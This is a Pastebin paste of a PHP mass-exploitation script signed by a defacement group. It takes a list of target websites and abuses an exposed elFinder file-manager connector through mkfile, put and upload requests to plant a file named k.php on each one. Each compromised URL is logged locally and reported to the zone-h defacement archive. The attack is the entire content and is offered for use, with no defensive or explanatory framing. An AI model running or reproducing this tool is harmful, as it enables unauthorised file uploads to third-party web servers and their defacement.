Advertisement
AZZATSSINS_CYBERSERK

WebHost RCE Elfinder + Auto mirror

Nov 16th, 2016
294
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.48 KB | None | 0 0
  1. <html>
  2. <title>Hostinger</title>
  3. <u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
  4. </b></i></u><br>
  5. <style type="text/css">
  6. html {
  7.     text-align: center;
  8. }
  9. a {
  10.     text-decoration: none;
  11.     color: black;
  12. }
  13. </style>
  14. <form method="post">
  15. Target: <br>
  16. <textarea name="target" placeholder="www.target.com" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
  17. <input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
  18. </form>
  19. </html>
  20. <?php
  21. function ngirim($url, $isi) {
  22. $ch = curl_init ("$url");
  23.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  24.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  25.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  26.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  27.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  28.       curl_setopt ($ch, CURLOPT_POST, 1);
  29.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  30.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  31.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  32. $data3 = curl_exec ($ch);
  33. return $data3;
  34. }
  35. $target = explode("\r\n", $_POST['target']);
  36. if($_POST['x']) {
  37.     foreach($target as $azzatssins) {
  38.     $korban = "http://".$azzatssins."/_file-manager/php/connector.php";
  39.     $azx = "http://".$azzatssins."/k.php";
  40.         $nama_doang = "k.php";
  41.         $isi_nama_doang = "";
  42.         $decode_isi = base64_decode($isi_nama_doang);
  43.         $encode = base64_encode($nama_doang);
  44.         $fp = fopen($nama_doang,"w");
  45.         fputs($fp, $decode_isi);
  46.         echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
  47.         echo "# Upload[1] ......<br>";
  48.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  49.         $b = file_get_contents("$url_mkfile");
  50.         $post1 = array(
  51.                 "cmd" => "put",
  52.                 "target" => "l1_$encode",
  53.                 "content" => "$decode_isi",
  54.                 );
  55.         $post2 = array(
  56.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  57.                 "upload[]" => "@$nama_doang",);
  58.         $output_mkfile = ngirim("$korban", $post1);
  59.         if(preg_match("/$nama_doang/", $output_mkfile)) {
  60.             echo "# Upload Success 1... => $nama_doang<br>#<br><br>";
  61.             $f = fopen('azzatssins.txt', 'ab');
  62. fwrite($f, "{$azx}\n");
  63. fclose($f);
  64.             $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  65. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  66. curl_setopt ($ch3, CURLOPT_POST, 1);
  67. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=AZZATSSINS&domain1=$azx&hackmode=1&reason=1");
  68. curl_exec ($ch3);
  69.         } else {
  70.             echo "# Upload Failed 1 <br># Uploading 2..<br>";
  71.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
  72.             if(preg_match("/$nama_doang/", $upload_ah)) {
  73.                 echo "# Upload Success 2 => $nama_doang<br>#<br><br>";
  74.                 $f = fopen('azzatssins.txt', 'ab');
  75. fwrite($f, "{$azx}\n");
  76. fclose($f);
  77.                 $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  78. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  79. curl_setopt ($ch3, CURLOPT_POST, 1);
  80. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=AZZATSSINS&domain1=$azx&hackmode=1&reason=1");
  81. curl_exec ($ch3);
  82.             } else {
  83.                 echo "# Upload Failed 2<br><br>";
  84.             }
  85.         }
  86.     }
  87. }
  88. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement